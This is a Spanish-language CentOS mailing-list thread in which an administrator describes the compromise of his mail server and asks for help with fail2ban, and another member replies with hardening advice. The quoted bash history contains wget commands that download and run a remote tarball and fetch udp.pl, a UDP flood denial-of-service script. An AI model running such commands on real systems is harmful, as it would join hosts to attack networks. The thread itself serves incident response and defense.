Estimado una consulta, cuando dices que tomaron posesión de tu servidor, finalmente se conectaron por ssh con el usuario que mencionas?? veo que sacaste el historial de la consola bash del usuario en cuestión, es así? Si tienes el servicio SSH escuchando al mundo, es muy probable que tengas que lidiar con este tipo de situaciones, quizás debas considerar implementar una VPN para administrar tu(s) server(s) desde Internet, investiga sobre OpenVPN que es una buena solución y además debes cerrar el servicio SSH a Internet. Puedes también separar (si las lucas lo permiten) el servicio SMTP del POP o IMAP que tengas y utilizar usuarios virtuales y autenticarlos contra un OpenLDAP, además deberías considerar implementar una arquitectura DMZ donde puedes separar tu FW, Servidores y LAN en zonas distintas, obviamente sólo si las lucas te lo permiten. Por lo que vi de las descargas parece estuviste a punto de ser parte una red de servidores Counter Strike (csservers_redirecte_linux_hlds.tar.gz) y quizás parte de una red zombie de ataques de negación de servicios (udp.pl).
Saludos!
El 5 de abril de 2013 12:12, Luis Alberto Roman Aguirre < luisroman80@hotmail.com> escribió:
Buenas amigos Listeros: Retomando el tema del servidor de correos, perdón por el retraso, y agradeciendo por la respuesta a:José María Terry Jiménez,Jesus Armando Uch Canu,Jose Fernández Rodríguez,Francesc Guitart ...a la LISTA en GENERAL ..y si me olvide de alguien mil disculpas. Bueno, es comento que los días posteriores fue tanto el escaneo que al final tomaron posesión de mi servidor a través de un usuario el cual borre pero nada tuve que formatear el servidor todo de cero de nuevo.Pero todo esto paso (CREO YO) , por un un usuario el cual descargo y ejecuto este archivo:
wget www.csservers.ro/csservers_redirecte_linux_hlds.tar.gz tar -pxzf csservers_redirecte_linux_hlds.tar.gz ps x killall screen ps x free -m screen cd csservers_redirecte_linux_hlds ./start cd ..
#wget http://y2khom3.evonet.ro/udp.pl #wget www.buble.biz/alinftp/udp.pl #wget www.packetstormsecurity.org/DoS/udp.pl #ps x #cd /tmp #ls -a #w
Ahora les detallo que ingresaron por un usuario el cual hace reenvio de correos a nivel local el cual no tenia contraseña, en el nuevo servidor le puse contraseña a todos los usuarios y demas con caracteres(mayusculas,minusculas y numeros). Lo que me sorprende fue aun despues de reinstalar el centos , creo ya que me agarraron de punto , porque note que sigo siendo escaneado por la misma lista antes de la reinstalacion les copio parte y les adjunto en txt:dovecot: Authentication Failures:base: 1376 Time(s)root: 52 Time(s)postmaster rhost=190.210.136.21 : 32 Time(s)mlizana rhost=10.1.0.28 : 20 Time(s)aa rhost=113.162.161.245 : 18 Time(s)admin rhost=183.60.20.40 : 14 Time(s)mconde: 10 Time(s)test rhost=183.60.20.40 : 10 Time(s)admin1 rhost=183.60.20.40 : 8 Time(s)dedicated rhost=183.60.20.40 : 8 Time(s)html rhost=183.60.20.40 : 8 Time(s)user1 rhost=183.60.20.40 : 8 Time(s)bdsistemas: 6 Time(s) La ip segun lo investigado es de China: http://whatismyipaddress.com/ip/183.60.20.40 y salio esto:(ojo hay otro router que salio mientras escribía es este http://201.77.5.191/ de Brazil)General IP InformationIP:183.60.20.40Decimal:3074167848Hostname:183.60.20.40ISP:ChinaNet Guangdong Province NetworkOrganization:ChinaNet Guangdong Province NetworkServices:None detectedType:BroadbandAssignment:Static IPBlacklist:Geolocation InformationCountry:China State/Region:GuangdongCity:GuangzhouLatitude:23.1167 (23° 7′ 0.12″ N)Longitude:113.25 (113° 15′ 0.00″ E)
Por recomendación de los ya mencionados amigos instale el fail2ban pero creo que no hace nada o bien algo estoy haciendo mal ,posteo configuracion:####Jail.conf[dovecot-pop3imap]enabled = truefilter = dovecot-pop3imapaction = iptables-multiport[name=dovecot-pop3imap, port="pop3,pop3s,imap,imaps", protocol=tcp] sendmail-whois[name=dovecot-pop3imap, dest=root, sender=user@xxx.xxx]logpath = /var/log/maillogmaxretry = 2#findtime = 600bantime = 5200 En la carpeta filter.d/dovecot-pop3imap.conf tengo esto:[Definition]failregex = dovecot: auth-worker(default): sql(.*,<HOST>): unknown user dovecot: (pop3|imap)-login: Aborted login (.*): .*, [<HOST>] dovecot: (pop3|imap)-login: Disconnected (auth failed, .*): .*, [<HOST>] dovecot: auth(default): passdb(.*,<HOST>): Attempted login with password having illegal chars dovecot: (pop3|imap)-login: Disconnected (auth failed, .*): .*, [<HOST>] dovecot: (pop3|imap)-login: Aborted login: .*, [<HOST>]ignoreregex = La cosa que los escaneos que me hacen al dovecot el fail2ban no tiene idea de ellos, algo estoy haciendo mal?, estoy por probar el OSSEC, pero si hay otra herramienta o bien algo mas que se pueda hacer, ya que ser victima de nuevo y lo peor que me baneen en la black list para una empresa que depende del correo es lo peor que les puede suceder, hablo por la experiencia amigos.
Gracias por la ayuda , por leer este mail, y por soportarme amigos, desde ya muchas gracias por sus respuestas.PDT:prometo responder como me fue , asi ayudar a alguien mas que pueda tener este problema Atte. Luis Roman
CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es